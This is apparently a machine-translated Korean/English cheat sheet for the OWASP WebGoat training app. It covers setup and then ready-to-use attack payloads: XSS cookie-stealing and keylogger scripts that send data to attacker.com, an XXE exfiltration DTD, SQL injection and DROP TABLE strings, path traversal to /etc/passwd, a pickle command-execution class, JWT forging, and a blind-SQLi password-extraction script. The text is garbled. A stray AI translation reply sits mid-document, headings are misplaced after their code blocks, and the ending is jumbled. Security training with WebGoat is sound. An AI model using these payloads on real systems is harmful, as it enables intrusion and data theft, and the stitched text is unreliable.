WebGoat 치트 시트
```bash
Pull WebGoat Docker image
docker pull webgoat/webgoat-8.0
Run WebGoat container
docker run -d -p 8080:8080 -p 9090:9090 —name webgoat webgoat/webgoat-8.0
Access WebGoat
Navigate to http://localhost:8080/WebGoat
WebWolf (support application): http://localhost:9090/WebWolf
Run with persistent data
docker run -d -p 8080:8080 -p 9090:9090 -v webgoat_data:/home/webgoat/.webgoat —name webgoat webgoat/webgoat-8.0
Stop container
docker stop webgoat
Remove container
docker rm webgoat
View logs
docker logs webgoat
WebGoat는 Open Web Application Security Project (OWASP)에서 개발한 의도적으로 취약한 웹 애플리케이션으로, 대화형이고 흥미로운 방식으로 웹 애플리케이션 보안 개념을 가르치기 위해 설계되었습니다. 기존의 보안 교육 자료와 달리, WebGoat는 사용자가 안전하고 통제된 환경에서 웹 애플리케이션 취약점을 식별하고 악용하는 실습 학습 환경을 제공합니다. 이 애플리케이션은 대화형 레슨과 챌린지를 통해 OWASP Top 10 취약점과 많은 추가 보안 개념을 다루는 포괄적인 교육 플랫폼으로 설계되었습니다.
이 플랫폼은 각 보안 개념을 명확한 목표, 배경 정보, 단계별 가이드가 있는 구조화된 학습 모듈로 제시하는 레슨 기반 접근 방식으로 차별화됩니다. WebGoat는 취약점 메커니즘, 실제 상황, 그리고 수정 전략에 대한 상세한 설명을 포함하여 보안 기본을 배우는 초보자부터 특정 공격 기법을 이해하려는 경험 있는 전문가까지 모두에게 가치 있는 도구입니다. 애플리케이션은 사용자의 진행 상황을 추적하고, 필요할 때 힌트를 제공하며, 시도한 솔루션에 대해 즉각적인 피드백을 제공합니다.
WebGoat의 아키텍처는 최신 웹 기술을 기반으로 구축되었으며, 백엔드에는 Spring Boot를, 사용자 인터페이스에는 현대적인 프론트엔드 프레임워크를 활용합니다. 이러한 현대적인 기반은 시연되는 취약점과 공격 기법이 현재의 웹 애플리케이션 개발 관행과 관련성 있음을 보장합니다. 플랫폼에는 특정 학습 목표가 있는 가이드 레슨과 다양한 공격 벡터를 탐색하고 실험할 수 있는 개방형 챌린지가 포함되어 있습니다.
WebGoat의 교육적 가치는 개인 학습을 넘어 교실 수업과 기업 교육 프로그램까지 확장됩니다. 이 플랫폼은 다중 사용자 계정, 진행 상황 추적, 구조화된 교육 환경에 적합한 관리 기능을 지원합니다. 많은 사이버 보안 교육 프로그램, 부트캠프, 기업 보안 인식 이니셔티브에서 WebGoat를 실습 교육 커리큘럼의 핵심 구성 요소로 사용하고 있습니다.
(I'll continue with the remaining sections in the same manner if you'd like me to translate them.)
Would you like me to proceed with translating the remaining sections?```yaml
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
webgoat:
image: webgoat/webgoat-8.0
container_name: webgoat
ports:
- "8080:8080"
- "9090:9090"
volumes:
- webgoat_data:/home/webgoat/.webgoat
environment:
- WEBGOAT_PORT=8080
- WEBWOLF_PORT=9090
restart: unless-stopped
volumes:
webgoat_data:
EOF
# Start WebGoat
docker-compose up -d
# View logs
docker-compose logs -f webgoat
# Stop WebGoat
docker-compose down
# Stop and remove volumes
docker-compose down -vStandalone JAR Installation
# Download WebGoat JAR
wget https://github.com/WebGoat/WebGoat/releases/download/v8.2.2/webgoat-server-8.2.2.jar
# Install Java (if not already installed)
# Ubuntu/Debian
sudo apt update
sudo apt install openjdk-11-jdk -y
# CentOS/RHEL
sudo yum install java-11-openjdk -y
# macOS
brew install openjdk@11
# Run WebGoat
java -jar webgoat-server-8.2.2.jar
# Run with custom port
java -jar webgoat-server-8.2.2.jar --server.port=9001
# Run with custom configuration
java -jar webgoat-server-8.2.2.jar --server.address=0.0.0.0 --server.port=8080
# Access WebGoat at http://localhost:8080/WebGoatSource Code Installation
# Install prerequisites
# Java 11+, Maven 3.6+, Git
# Clone repository
git clone https://github.com/WebGoat/WebGoat.git
cd WebGoat
# Build WebGoat
mvn clean install
# Run WebGoat
mvn spring-boot:run
# Build standalone JAR
mvn clean package
java -jar webgoat-server/target/webgoat-server-*.jar
# Run WebWolf separately
cd webwolf
mvn spring-boot:runKubernetes Deployment
# Create webgoat-deployment.yaml
cat << 'EOF' > webgoat-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: webgoat
labels:
app: webgoat
spec:
replicas: 1
selector:
matchLabels:
app: webgoat
template:
metadata:
labels:
app: webgoat
spec:
containers:
- name: webgoat
image: webgoat/webgoat-8.0
ports:
- containerPort: 8080
- containerPort: 9090
env:
- name: WEBGOAT_PORT
value: "8080"
- name: WEBWOLF_PORT
value: "9090"
---
apiVersion: v1
kind: Service
metadata:
name: webgoat-service
spec:
selector:
app: webgoat
ports:
- name: webgoat
port: 8080
targetPort: 8080
- name: webwolf
port: 9090
targetPort: 9090
type: LoadBalancer
EOF
# Deploy to Kubernetes
kubectl apply -f webgoat-deployment.yaml
# Check deployment status
kubectl get pods
kubectl get services
# Access WebGoat
kubectl port-forward service/webgoat-service 8080:8080Initial Setup and Configuration
First-Time Setup
# Access WebGoat
# Navigate to http://localhost:8080/WebGoat
# Create user account
# Click "Register new user"
# Username: your_username
# Password: your_password
# Login to WebGoat
# Use created credentials
# Access WebWolf (support application)
# Navigate to http://localhost:9090/WebWolf
# Use same credentials as WebGoatUser Management
# Default admin account (if enabled)
# Username: admin
# Password: admin
# Create additional users
# Each user has separate progress tracking
# Suitable for classroom environments
# Reset user progress
# Delete user data directory
# Or use admin interface (if available)
# Backup user progress
# Copy .webgoat directory
# Contains user data and progressConfiguration Options
# Custom server configuration
# Create application.properties
cat << 'EOF' > application.properties
server.port=8080
server.address=0.0.0.0
logging.level.org.owasp.webgoat=DEBUG
webgoat.user.directory=/custom/path
EOF
# Run with custom configuration
java -jar webgoat-server-*.jar --spring.config.location=application.properties
# Environment variables
export WEBGOAT_PORT=8080
export WEBWOLF_PORT=9090
export WEBGOAT_SSLENABLED=false
# JVM options
java -Xmx1024m -Xms512m -jar webgoat-server-*.jarLesson Categories and Modules
General Security Awareness
# HTTP Basics
# - Understanding HTTP protocol
# - Request/response structure
# - Headers and methods
# - Status codes
# HTTP Proxies
# - Proxy configuration
# - Intercepting requests
# - Modifying traffic
# - Burp Suite integration
# Developer Tools
# - Browser developer tools
# - Network tab analysis
# - Console manipulation
# - Source code inspectionAuthentication Flaws
# Authentication Bypasses
# Lesson: Bypass authentication mechanisms
# Method 1: SQL Injection in login
Username: admin' --
Password: anything
# Method 2: Logic flaws
# Analyze authentication logic
# Find bypass conditions
# Method 3: Session manipulation
# Modify session tokens
# Predict session values
# Password Reset Flaws
# Lesson: Exploit password reset functionality
# Method 1: Parameter manipulation
# Change user parameter in reset request
# Reset other users' passwords
# Method 2: Token prediction
# Analyze reset token generation
# Predict valid tokens
# Secure Passwords
# Lesson: Password security concepts
# - Password complexity
# - Common passwords
# - Brute force attacks
# - Password storageAccess Control Flaws
# Insecure Direct Object References
# Lesson: Access unauthorized resources
# Method 1: Parameter manipulation
# Change user ID in requests
# Access other users' data
# Method 2: Path traversal
# Modify file paths
# Access system files
# Missing Function Level Access Control
# Lesson: Access restricted functions
# Method 1: URL manipulation
# Access admin functions directly
# Bypass menu restrictions
# Method 2: Role manipulation
# Modify role parameters
# Escalate privilegesCross-Site Scripting (XSS)
# Reflected XSS
# Lesson: Execute JavaScript in victim's browser
# Basic payload
<script>alert('XSS')</script>
# Advanced payloads
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src=javascript:alert('XSS')>
# Bypass filters
<Script>alert('XSS')</Script>
<SCRIPT>alert('XSS')</SCRIPT>
<script>alert(String.fromCharCode(88,83,83))</script>
# Stored XSS
# Lesson: Persistent XSS attacks
# Basic stored payload
<script>alert('Stored XSS')</script>
# Cookie stealing
<script>
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
</script>
# Keylogger
<script>
document.onkeypress = function(e) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/log.php?key=' + String.fromCharCode(e.which), true);
xhr.send();
\\\\}
</script>
# DOM-based XSS
# Lesson: Client-side XSS
# URL fragment manipulation
http://localhost:8080/WebGoat/start.mvc#<script>alert('XSS')</script>
# JavaScript injection
javascript:alert('XSS')Cross-Site Request Forgery (CSRF)
<form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
<input type="hidden" name="csrf" value="false">
<input type="submit" value="Click me!">
</form>
<form id="csrf" action="http://localhost:8080/WebGoat/csrf/review" method="POST">
<input type="hidden" name="reviewText" value="This is a CSRF attack">
<input type="hidden" name="stars" value="1">
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
</form>
<script>document.getElementById('csrf').submit();</script>
<img src="http://localhost:8080/WebGoat/csrf/basic-get-flag?csrf=false">
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8080/WebGoat/csrf/review', true);
xhr.onreadystatechange = function() \\\\{
if (xhr.readyState == 4) \\\\{
var token = xhr.responseText.match(/name="csrf" value="([^"]+)"/)[1];
// Use extracted token in CSRF attack
\\\\}
\\\\};
xhr.send();
</script>SQL Injection
# String SQL Injection
# Lesson: Basic SQL injection
# Authentication bypass
Username: admin' --
Password: anything
# Data extraction
' UNION SELECT user, password FROM users --
' UNION SELECT table_name, column_name FROM information_schema.columns --
# Numeric SQL Injection
# Lesson: Injection in numeric parameters
# Basic injection
1 OR 1=1
1 UNION SELECT user, password FROM users
# Advanced injection
1; DROP TABLE users; --
1; INSERT INTO users VALUES ('hacker', 'password'); --
# Blind SQL Injection
# Lesson: Extract data without direct output
# Boolean-based blind injection
1 AND 1=1 (True condition)
1 AND 1=2 (False condition)
# Extract database name
1 AND LENGTH(database())=8
1 AND SUBSTRING(database(),1,1)='w'
# Time-based blind injection
1; WAITFOR DELAY '00:00:05' --
1 AND IF(1=1, SLEEP(5), 0)
# Advanced SQL Injection
# Lesson: Complex injection scenarios
# Second-order injection
# Inject payload in one location
# Trigger execution in another
# NoSQL injection
# MongoDB injection examples
\\\\{"username": \\\\{"$ne": null\\\\}, "password": \\\\{"$ne": null\\\\}\\\\}
\\\\{"username": \\\\{"$regex": ".*"\\\\}, "password": \\\\{"$regex": ".*"\\\\}\\\\}Path Traversal
# Path Traversal Lesson
# Objective: Access files outside web root
# Basic traversal
../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hosts
# Encoded traversal
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%252f..%252f..%252fetc%252fpasswd
# Double encoding
..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts
# Null byte injection (older systems)
../../../etc/passwd%00
../../../etc/passwd%00.jpg
# Filter bypass
....//....//....//etc/passwd
..././..././..././etc/passwdInsecure Deserialization
# Insecure Deserialization Lesson
# Objective: Exploit deserialization vulnerabilities
# Java deserialization
# Create malicious serialized object
# Inject into application
# PHP deserialization
# Object injection payload
O:4:"User":2:\\\\{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";\\\\}
# Python pickle deserialization
# Create malicious pickle payload
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ('whoami',))
payload = pickle.dumps(Exploit())
# .NET deserialization
# BinaryFormatter exploitation
# Create malicious .NET objectXML External Entities (XXE)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root></root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;
]>
<root></root>
JWT (JSON Web Tokens)
# JWT Lesson: JSON Web Token vulnerabilities
# JWT structure analysis
# Header.Payload.Signature
# Base64 decode each part
# Algorithm confusion attack
# Change algorithm from RS256 to HS256
# Use public key as HMAC secret
# None algorithm attack
# Set algorithm to "none"
# Remove signature
# Weak secret attack
# Brute force JWT secret
# Use common passwords
# JWT manipulation
# Modify payload claims
# Change user role/permissions
# Extend token expiration
# Example JWT manipulation
import jwt
import base64
# Decode JWT
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
decoded = jwt.decode(token, verify=False)
# Modify payload
decoded['role'] = 'admin'
decoded['exp'] = 9999999999
# Re-encode with weak secret
new_token = jwt.encode(decoded, 'secret', algorithm='HS256')Advanced Challenges
Challenge Solutions
# Admin Lost Password Challenge
# Objective: Reset admin password
# Step 1: Analyze password reset mechanism
# Step 2: Find security questions
# Step 3: Research admin information
# Step 4: Answer security questions
# Step 5: Reset password
# Without Password Change Challenge
# Objective: Change password without knowing current
# Method 1: Session manipulation
# Intercept password change request
# Remove current password parameter
# Method 2: CSRF attack
# Create CSRF form for password change
# Trick admin into submitting
# Admin Password Up Challenge
# Objective: Escalate to admin privileges
# Method 1: SQL injection
# Extract admin password hash
# Crack or replace hash
# Method 2: Session hijacking
# Steal admin session token
# Impersonate admin user
```### 맞춤형 익스플로잇 개발
```python
#!/usr/bin/env python3
# WebGoat SQL injection exploit
import requests
import string
import sys
class WebGoatSQLi:
def __init__(self, base_url, session_cookie):
self.base_url = base_url
self.session = requests.Session()
self.session.cookies.set('JSESSIONID', session_cookie)
def blind_sqli_extract(self, table, column, condition=""):
"""Extract data using blind SQL injection"""
data = ""
position = 1
while True:
found_char = False
for char in string.printable:
if char in ['%', '_', '\\']:
continue
# Construct blind SQL injection payload
payload = f"1' AND SUBSTRING((SELECT \\\\{column\\\\} FROM \\\\{table\\\\} \\\\{condition\\\\}),\\\\{position\\\\},1)='\\\\{char\\\\}' --"
response = self.test_injection(payload)
if self.is_successful_injection(response):
data += char
found_char = True
print(f"Found: \\\\{data\\\\}")
break
if not found_char:
break
position += 1
return data
def test_injection(self, payload):
"""Test SQL injection payload"""
url = f"\\\\{self.base_url\\\\}/SqlInjection/attack5a"
data = \\\\{
'account': payload,
'operator': 'equals',
'injection': payload
\\\\}
return self.session.post(url, data=data)
def is_successful_injection(self, response):
"""Check if injection was successful"""
return "User found" in response.text
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python3 webgoat_sqli.py <base_url> <session_cookie>")
sys.exit(1)
base_url = sys.argv[1]
session_cookie = sys.argv[2]
exploit = WebGoatSQLi(base_url, session_cookie)
# Extract admin password
print("Extracting admin password...")
password = exploit.blind_sqli_extract("users", "password", "WHERE username='admin'")
print(f"Admin password: \\\\{password\\\\}")
```### 자동화된 테스트 스크립트
```bash
#!/bin/bash
# WebGoat automated testing script
WEBGOAT_URL="http://localhost:8080/WebGoat"
SESSION_COOKIE=""
# Function to test XSS
test_xss() \\\\{
echo "[*] Testing XSS vulnerabilities..."
payloads=(
"<script>alert('XSS')</script>"
"<img src=x onerror=alert('XSS')>"
"<svg onload=alert('XSS')>"
)
for payload in "$\\\\{payloads[@]\\\\}"; do
response=$(curl -s -b "JSESSIONID=$SESSION_COOKIE" \
-d "message=$payload" \
"$WEBGOAT_URL/CrossSiteScripting/attack1")
if [[ $response == *"$payload"* ]]; then
echo "[+] XSS successful: $payload"
else
echo "[-] XSS failed: $payload"
fi
done
\\\\}
# Function to test SQL injection
test_sqli() \\\\{
echo "[*] Testing SQL injection..."
payloads=(
"' OR '1'='1"
"' OR 1=1 --"
"' UNION SELECT user, password FROM users --"
)
for payload in "$\\\\{payloads[@]\\\\}"; do
response=$(curl -s -b "JSESSIONID=$SESSION_COOKIE" \
-d "username=$payload&password=test" \
"$WEBGOAT_URL/SqlInjection/attack1")
if [[ $response == *"Welcome"* ]]; then
echo "[+] SQL injection successful: $payload"
else
echo "[-] SQL injection failed: $payload"
fi
done
\\\\}
# Function to test CSRF
test_csrf() \\\\{
echo "[*] Testing CSRF vulnerabilities..."
# Create CSRF payload
csrf_payload="<form action='$WEBGOAT_URL/csrf/basic-get-flag' method='POST'>
<input type='hidden' name='csrf' value='false'>
</form>
<script>document.forms[0].submit();</script>"
echo "$csrf_payload" > csrf_test.html
echo "[+] CSRF payload created: csrf_test.html"
\\\\}
# Main execution
echo "[*] Starting WebGoat automated testing"
echo "[*] Target: $WEBGOAT_URL"
test_xss
test_sqli
test_csrf
echo "[*] Testing complete"
```## 보안 도구와의 통합
```bash
# Configure Burp Suite for WebGoat testing
# 1. Set up proxy
# Browser proxy: 127.0.0.1:8080
# Burp proxy listener: 127.0.0.1:8080
# 2. Configure scope
# Add WebGoat URL to scope
# Include: http://localhost:8080/WebGoat/*
# 3. Spider WebGoat
# Automatically discover all endpoints
# Map application structure
# 4. Use Burp tools
# Repeater: Manual request testing
# Intruder: Automated payload testing
# Scanner: Automated vulnerability detection
# Burp Suite extensions for WebGoat
# - WebGoat lesson tracker
# - Automated solution checker
# - Custom payload generators
```### Burp Suite 통합
```bash
# ZAP automated scanning of WebGoat
zap-baseline.py -t http://localhost:8080/WebGoat/
# ZAP full scan
zap-full-scan.py -t http://localhost:8080/WebGoat/
# ZAP API usage
# Start ZAP daemon
zap.sh -daemon -port 8090
# Authenticate to WebGoat
curl "http://localhost:8090/JSON/authentication/action/setAuthenticationCredentials/" \
-d "contextId=0&authCredentialsConfigParams=username%3Dtest%26password%3Dtest"
# Spider WebGoat
curl "http://localhost:8090/JSON/spider/action/scan/?url=http://localhost:8080/WebGoat/"
# Active scan
curl "http://localhost:8090/JSON/ascan/action/scan/?url=http://localhost:8080/WebGoat/"
# Generate report
curl "http://localhost:8090/OTHER/core/other/htmlreport/" > webgoat_report.html
```### OWASP ZAP 통합
```python
#!/usr/bin/env python3
# WebGoat comprehensive testing framework
import requests
import json
import time
from urllib.parse import urljoin
class WebGoatTester:
def __init__(self, base_url, username, password):
self.base_url = base_url
self.session = requests.Session()
self.username = username
self.password = password
self.authenticated = False
def authenticate(self):
"""Authenticate to WebGoat"""
login_url = urljoin(self.base_url, '/login')
login_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(login_url, data=login_data)
if response.status_code == 200:
self.authenticated = True
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def test_lesson(self, lesson_path, test_data):
"""Test specific WebGoat lesson"""
if not self.authenticated:
if not self.authenticate():
return False
lesson_url = urljoin(self.base_url, lesson_path)
try:
response = self.session.post(lesson_url, data=test_data)
# Check for success indicators
if any(indicator in response.text.lower() for indicator in
['congratulations', 'success', 'correct', 'well done']):
print(f"[+] Lesson \\\\{lesson_path\\\\} completed successfully")
return True
else:
print(f"[-] Lesson \\\\{lesson_path\\\\} failed")
return False
except Exception as e:
print(f"[!] Error testing lesson \\\\{lesson_path\\\\}: \\\\{e\\\\}")
return False
def run_all_tests(self):
"""Run all available tests"""
test_cases = [
\\\\{
'lesson': '/SqlInjection/attack1',
'data': \\\\{'username': "' OR '1'='1", 'password': 'test'\\\\}
\\\\},
\\\\{
'lesson': '/CrossSiteScripting/attack1',
'data': \\\\{'message': '<script>alert("XSS")</script>'\\\\}
\\\\},
\\\\{
'lesson': '/CSRF/basic-get-flag',
'data': \\\\{'csrf': 'false'\\\\}
\\\\}
]
results = []
for test_case in test_cases:
result = self.test_lesson(test_case['lesson'], test_case['data'])
results.append(\\\\{
'lesson': test_case['lesson'],
'success': result
\\\\})
return results
def generate_report(self, results):
"""Generate test report"""
report = \\\\{
'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
'target': self.base_url,
'total_tests': len(results),
'passed': sum(1 for r in results if r['success']),
'failed': sum(1 for r in results if not r['success']),
'results': results
\\\\}
with open('webgoat_test_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"\n[*] Test Report Generated")
print(f"Total Tests: \\\\{report['total_tests']\\\\}")
print(f"Passed: \\\\{report['passed']\\\\}")
print(f"Failed: \\\\{report['failed']\\\\}")
print(f"Success Rate: \\\\{(report['passed']/report['total_tests'])*100:.1f\\\\}%")
if __name__ == "__main__":
tester = WebGoatTester("http://localhost:8080/WebGoat", "test", "test")
results = tester.run_all_tests()
tester.generate_report(results)
```### 맞춤형 보안 테스트 프레임워크
```bash
# Phase 1: Foundation (Weeks 1-2)
# - HTTP Basics
# - Developer Tools
# - Basic Authentication
# - Simple XSS
# Phase 2: Core Vulnerabilities (Weeks 3-6)
# - SQL Injection (all types)
# - XSS (reflected, stored, DOM)
# - CSRF
# - Access Control
# Phase 3: Advanced Topics (Weeks 7-10)
# - XXE
# - Insecure Deserialization
# - JWT vulnerabilities
# - Path Traversal
# Phase 4: Integration (Weeks 11-12)
# - Tool usage (Burp, ZAP)
# - Automated testing
# - Report writing
# - Real-world application
```## 교육 모범 사례
```bash
# Create learning journal
mkdir ~/webgoat_learning
cd ~/webgoat_learning
# Track lesson completion
cat << 'EOF' > progress.md
# WebGoat Learning Progress
## Completed Lessons
- [ ] HTTP Basics
- [ ] Developer Tools
- [ ] SQL Injection - String
- [ ] SQL Injection - Numeric
- [ ] SQL Injection - Blind
- [ ] XSS - Reflected
- [ ] XSS - Stored
- [ ] XSS - DOM
- [ ] CSRF
- [ ] Access Control
- [ ] Path Traversal
- [ ] XXE
- [ ] JWT
- [ ] Insecure Deserialization
## Notes
### SQL Injection
- Key learning: Always use parameterized queries
- Common mistake: Trusting user input
### XSS
- Key learning: Validate and encode all user input
- Common mistake: Only server-side validation
EOF
# Document solutions
cat << 'EOF' > solutions.md
# WebGoat Solutions
## SQL Injection - String
**Objective**: Bypass authentication
**Solution**: Username: `admin' --`, Password: `anything`
**Explanation**: Comment out password check
## XSS - Reflected
**Objective**: Execute JavaScript
**Solution**: `<script>alert('XSS')</script>`
**Explanation**: No input validation
EOF
```### 구조화된 학습 경로
```bash
# Multi-user setup for classroom
# Each student gets unique account
# Progress tracked separately
# Instructor dashboard
# Monitor student progress
# Identify common issues
# Provide targeted help
# Group exercises
# Team-based challenges
# Peer review sessions
# Collaborative problem solving
# Assessment integration
# Automated grading
# Progress reports
# Skill verification
```### 진행 상황 추적
https://github.com/WebGoat/WebGoat##
# 교실 통합
https://owasp.org/www-project-webgoat/---
https://owasp.org/www-project-top-ten/ **⚠️ 보안 공지**: WebGoat는 교육 목적으로만 설계된 의도적으로 취약한 웹 애플리케이션입니다. 프로덕션 네트워크나 인터넷에서 접근 가능한 시스템에 배포해서는 안 됩니다. WebGoat는 항상 가상 머신이나 프로덕션 시스템에 대한 네트워크 접근이 없는 컨테이너와 같은 격리된 통제된 환경에서 실행해야 합니다. 이 애플리케이션에는 의도적인 보안 취약점이 포함되어 있어 인터넷에 노출될 경우 시스템 보안을 위협할 수 있습니다. WebGoat를 웹 애플리케이션 보안 개념을 학습하기 위해 책임감 있게 사용하고 항상 조직의 보안 정책을 따르십시오.
https://portswigger.net/web-security **📚 추가 리소스**:
- [WebGoat 공식 GitHub 저장소](